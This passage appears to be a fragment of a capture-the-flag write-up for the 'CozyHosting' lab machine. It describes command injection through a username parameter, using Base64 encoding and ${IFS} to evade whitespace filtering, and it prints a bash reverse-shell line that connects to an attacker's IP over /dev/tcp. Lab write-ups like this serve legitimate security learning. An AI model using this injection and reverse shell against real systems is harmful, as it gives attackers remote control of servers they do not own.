CozyHosting

 After some time of research, We need to encode the payload to Base64 and ${IFS} to escape whitespaces.

 Internal Field Separator (IFS), determines how Bash recognizes word boundaries while splitting a sequence of character strings.
 The default value of IFS is a three-character string comprising a space, tab, and newline.
-From Baeldung Linux.
+From Baeldung Linuxarrow-up-right.

 Now, this is the crafted payload to be supplied in the username parameter.
 The Base64 encoded string is the encoded version of reverse shell payload sh -i >& /dev/tcp/<YOUR_IP>/1234 0>&1 .
 It will decode it using Base64 and then spit it out as a bash command.